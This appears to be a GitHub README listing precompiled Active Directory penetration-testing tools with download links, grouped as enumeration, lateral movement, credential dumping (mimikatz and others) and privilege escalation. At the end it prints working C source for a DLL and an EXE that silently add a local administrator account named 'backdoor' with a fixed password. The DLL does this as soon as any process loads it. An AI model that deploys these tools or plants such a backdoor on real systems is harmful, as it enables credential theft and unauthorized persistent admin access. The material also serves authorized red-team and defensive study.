Collection of useful pre-compiled .NET binaries or other executables for penetration testing Windows Active Directory environments

jakobfriedl/precompiled-binaries

Precompiled Binaries & AD Toolset

Collection of useful tools, scripts and pre-compiled binaries for enumerating and exploiting Active Directory environments or standalone Windows hosts. All binaries listed in this repository have either been downloaded from the official release page or compiled from the official source code using Visual Studio.

Disclaimer

Caution

ONLY use for ethical purposes and against targets that you are permitted to attack!

Contents

Enumeration

Name Description Download
SharpHound Active Directory enumeration and visualization https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/SharpHound.exe
Seatbelt Windows host enumeration https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/Seatbelt.exe
SharpUp Privilege Escalation Checks https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/SharpUp.exe
winPEAS Windows host enumeration https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/winPEAS.exe
SharpView C# Port of PowerView.ps1 https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/SharpView.exe
NoPowerShell Execute PowerShell cmdlets in memory https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/NoPowerShell.exe

Lateral Movement

Name Description Download
Rubeus Kerberos ticket attacks and abuse https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Rubeus.exe
Whisker Shadow Credential attacks https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Whisker.exe
ADFSDump Dump information from ADFS to be used with ADFSpoof https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/ADFSDump.exe
SharpSCCM Interaction with SCCM for lateral movement https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SharpSCCM.exe
SpoolSample Coerce Authentication for Unconstrained Delegation https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SpoolSample.exe
RunasCS C# Implementation of the runas command for lateral movement with valid credentials (not stealthy) https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/RunasCs.exe
ADModule Microsoft Signed DLL for importing the AD Module https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/ADModule.dll
SharpRDP CLI-based lateral movement with RDP https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SharpRDP.exe
SharpSQL C# Port of PowerUpSQL.ps1 for SQL Server Exploitation https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SharpSQL.exe
SharpMove Lateral Movement with .NET https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/SharpMove.exe
Sharpmad MachineAccountQuota and DNS Exploitation https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Sharpmad.exe

GPO Abuse

Name Description Download
SharpGPO Group Policy modification and editing https://github.com/jakobfriedl/precompiled-binaries/blob/main/LateralMovement/GPOAbuse/SharpGPO.exe
SharpGPOAbuse Group Policy exploitation and abuse https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/GPOAbuse/SharpGPOAbuse.exe

Certificate Abuse

Name Description Download
Certify Certificate abuse and enumeration https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/CertificateAbuse/Certify.exe
PassTheCert Certificate abuse https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/CertificateAbuse/PassTheCert.exe
ForgeCert Certificate forging https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/CertificateAbuse/ForgeCert.exe

Azure AD Abuse

Name Description Download
ADSyncDecrypt Extract and decrypt Azure AD credentials https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/AzureAD/ADSyncDecrypt.exe
AzureAD_Decrypt_MSOL Dump and extract Azure AD credentials https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/AzureAD/AzureAD_Decrypt_MSOL.ps1

Credential Gathering

Name Description Download
mimikatz Credential dumping and ticket attacks https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/mimikatz.exe
SharpDPAPI Credential gathering https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpDPAPI.exe
SharpChrome Credential gathering (specifically from Chrome) https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpChrome.exe
SharpKatz C# Port of mimikatz https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpKatz.exe
SharpLAPS Dump LAPS passwords https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpLAPS.exe
BetterSafetyKatz Run latest mimikatz in memory https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/BetterSafetyKatz.exe
GMSAPasswordReader Dump GMSA passwords https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/GMSAPasswordReader.exe

Privilege Escalation

Name Description Download
PrintSpoofer Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/PrintSpoofer64.exe
NetworkServiceExploit Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/NetworkServiceExploit.exe
GodPotato Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/GodPotato.exe
JuicyPotato Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/JuicyPotato.exe
SharpEfsPotato Token Impersonation, SeImpersonatePrivilege https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/Token/SharpEfsPotato.exe
KrbRelayUp Universal Local Privilege Escalation in Domains where LDAP signing is not enforced https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/KrbRelayUp.exe
KrbRelay Privilege Escalation by relaying Kerberos from DCOM connection (Manual alternative to KrbRelayUp) https://github.com/jakobfriedl/precompiled-binaries/raw/main/PrivilegeEscalation/KrbRelay/KrbRelay.exe

Scripts

Name Description Download
PowerView Enumeration https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/PowerView.ps1
Powermad MachineAccountQuota and DNS Exploitation https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/Powermad.ps1
Inveigh MitM Attacks & Spoofing https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/Inveigh.ps1
PowerUp Windows Privilege Escalation https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/PowerUp.ps1
PowerUpSQL SQL Server Enumeration and Exploitation https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/PowerUpSQL.ps1
LAPSToolkit LAPS Password dumping https://github.com/jakobfriedl/precompiled-binaries/raw/main/Scripts/LAPSToolkit.ps1

Custom

SimpleBackdoorAdmin.dll

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,           // Handle to DLL module
    DWORD ul_reason_for_call, // Reason for calling function
    LPVOID lpReserved )       // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
        i = system ("net user backdoor Password123! /add");
        i = system ("net localgroup administrators backdoor /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

SimpleBackdoorAdmin.exe

#include <stdlib.h>

int main ()
{
  system("net user backdoor Password123! /add");
  system("net localgroup administrators backdoor /add");

  return 0;
}
